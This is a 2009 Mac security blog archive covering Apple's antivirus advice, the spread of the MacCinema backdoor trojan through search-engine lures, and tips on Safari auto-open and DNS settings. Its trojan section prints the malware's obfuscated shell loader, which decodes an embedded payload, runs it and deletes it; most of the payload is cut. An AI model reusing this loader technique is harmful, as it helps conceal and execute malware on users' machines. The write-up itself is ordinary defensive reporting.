Archive

Archive for June, 2009

Snow Leopard Recommends Antivirus

Apple updated its web pages as Snow Leopard is expected to be released this September.

A notable change is in Security section, where Apple admits that “no system can be 100 percent immune from every threat” and acknowledges that “antivirus software may offer additional protection”.

AppleSecAdvice

Interestingly, prior to this change is a strong campaign that every “Mac is Secure”.  (Thank goodness, I have kept a copy of those pages because I have noted and reference a link in my abstract here.)

AppleSafer

If you’ll reckon this page last year (below) – this has caught massive media attention as Apple recommends Antivirus which is contrary to its security campaign. The attention further escalates when Apple removed and said that it was “incurrate” – referring that it is old and not updated.  (Google “Apple removes anti-virus” for further story).

AppleAntivirusAlthough, I think users should understand here is that “Security is a Process and NOT a Product”.  Evidently, gaining popularity delivers both worlds – Good and Bad. Obviously, users with confidential information stored in their hard drives and performs financial transaction online must understand that it is users’ responsibility to protect themselves from outside threats especially with the growing numbers of organized cyber-crimes.

Visualizing OS X Threat Internet Distribution

viz

This has been discussed here and added the graph @ http://secviz.org/

Updated MacCinema

Last week,  I have spotted a modified version of MacCinema. It was not significant, the modification was purely to avoid scanners detection.

The script looks like this:

#!/bin/sh
if [ $# != 1 ]; then type=0; else type=1; fi && tail -53 $0 | sed 's/lala/nigeb/' |  sed '/\n/!G;s/\(.\)\(.*\n\)/&\2\1/;//D;s/.//' | tail -r | uudecode -o /dev/stdout | sed 's/applemac/AdobeFlash/' | sed 's/bsd/7037/' | sed 's/gnu/'$type'/' >`uname -p` && sh `uname -p` && rm `uname -p` && exit
dne
`
``@"R5V9IY&(W<S-@H68H)78S178F%F"-EC)95D(&!F*J44,G@214%$*H
"%$8X0"*"93505D*U4%+T,44O@2-\@5,F`F0J02(`AB0!!&.B@"2J040PH03M
****content removed****
LU"(B%&=N]F<C!6/T-7:X5F"B,G;)UR9UQ&4@079N)79TY62ODG<A)G8IQT+M
BT#:T%&<*(R8AU69L!'<A)2/,ED5%I@(R@C+T8C+S83,N,3,R(2/21$1!!52M
agazagiz 666 lala

Anyway, this backdoor trojan is massively distributed around the internet. It uses Google SEO, so most users stumbled to these malicious sites from Google search.

Some lures Mac users promising free downloads of full version softwares, cracks, serials, activators, generators, keys, fixes – just like the screenshot below.   crack

…while other links to Mac videos like this PornTube below.

Porntube

There are malware serving sites that is bit aggressive, where it does not ask user to download the DMG files instead it automatically downloads and mounts – as it is turned on by default, you can disable automount by following this instruction:

1. Open Safari

2. Open “Preferences” under the “Safari” menu

3. Click on the “General” tab

4. Un-check the “Open ’safe’ files after downloading” box

5. Close Safari’s preferences

This instruction has been previously discussed here.

Stay safe!

OS X Tips: How To Check Your DNS Settings

Option 1 – Locate and click the Apple icon in your upper left corner and click “System Preferences”, then “Network” and search for “DNS Server”.  If you want to modify and remove malicious entry, you can simply click the box and input the right address.  However, if you are not sure simply try release & renew as instructed below.

Preference

Option 2 – Open Terminal (~/Applications/Utilities or you can search it using spotlight)

From the terminal, type “cat /etc/resolv.conf”. This command will return your  domain and name servers.

Another command is, “scutil –-dns”. Check resolver #1, this often returns domain and name servers as well.

Release and Renew to remove malicious DNS entry

From the terminal, type the following:

sudo ifconfig en1 down
sudo ifconfig en1 up

**Note: sudo means run as root user, so it will require you to input password. Also, en1 is often interfaced to LAN and en0 to Wireless – just try and see which one will work.

Another way is to unplug your internet connnection and reconnect. This will also work (”,)